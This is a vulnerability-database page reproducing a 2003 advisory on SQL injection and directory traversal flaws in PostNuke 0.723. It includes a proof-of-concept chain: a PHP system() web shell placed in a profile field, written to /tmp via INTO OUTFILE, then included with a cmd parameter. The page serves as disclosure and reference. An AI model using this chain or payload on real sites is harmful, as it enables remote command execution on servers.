Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

postnuke723.txt

🗓️ 11 Mar 2003 00:00:00Reported by PokleyzzType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 26 Views

Postnuke v 0.723 has SQL injection and directory traversal vulnerabilities documented.

Code
`Products: Postnuke v 0.723 (http://www.postnuke.com)  
Date: 09 March 2003  
Author: pokleyzz <pokleyzz_at_scan-associates.net>  
Contributors: sk_at_scan-associates.net   
shaharil_at_scan-associates.net   
munir_at_scan-associates.net  
URL: http://www.scan-associates.net  
  
Summary: Postnuke v 0.723 SQL injection and directory traversing  
  
Description  
===========  
Postnuke is Web Content Management System written in PHP and using mysql   
as database backend.  
  
Details  
=======  
There is multiple vulnerabilities in Postnuke v 0.723 as described below.  
  
1) SQL Injection in Members_List module  
  
There is lack in error checking in $sortby variable which is stripslashes.  
This variable is used as SQL query to select postnuke member list.  
  
ex:  
  
http://[postnuke   
site]/modules.php?op=modload&name=Members_List&file=index&letter=[username]&sortby=[sql   
query]  
  
2) Directory traversing through $theme variable  
  
Attacker may include file any file named theme.php  
  
ex:  
http://[postnuke site]/index.php?theme=../../../../../../../../tmp  
  
Vendor Response   
===============   
Vendor has been contacted on 24/02/2003 and fix is available from   
http://www.postnuke.com  
  
  
http://news.postnuke.com/modules.php?op=modload&name=News&file=article&sid=2378  
  
Proof of concept  
================  
Postnuke remote command execution  
  
requirement:  
- PostNuke v0.723 maybe other   
- PostNuke user  
- Mysql user must have permision to select into outfile (FILE_PREV)  
  
1) Register as postnuke user.  
  
2) Login as user you just registered. After login change your "Real name"   
to something like "<?system($HTTP_GET_VARS[cmd])?>" or just   
"<?system($cmd)?>"  
  
3) Sql injection in "Members_List" modules.  
Select user information into /tmp/theme.php  
.  
http://[postnuke   
site]/modules.php?op=modload&name=Members_List&file=index&letter=[your   
username]&sortby=uname+into+outfile+'/tmp/theme.php'%23  
  
4) Directory traversing in $theme variable  
Run command on server  
  
http://[postnuke   
site]/index.php?theme=../../../../../../../../tmp&cmd=[command]  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
11 Mar 2003 00:00Current
7.4High risk
Vulners AI Score7.4
postnukesql injectiondirectory traversalmember listfile inclusionsecurity vulnerabilitiesphp vulnerabilitymysql permissions.
26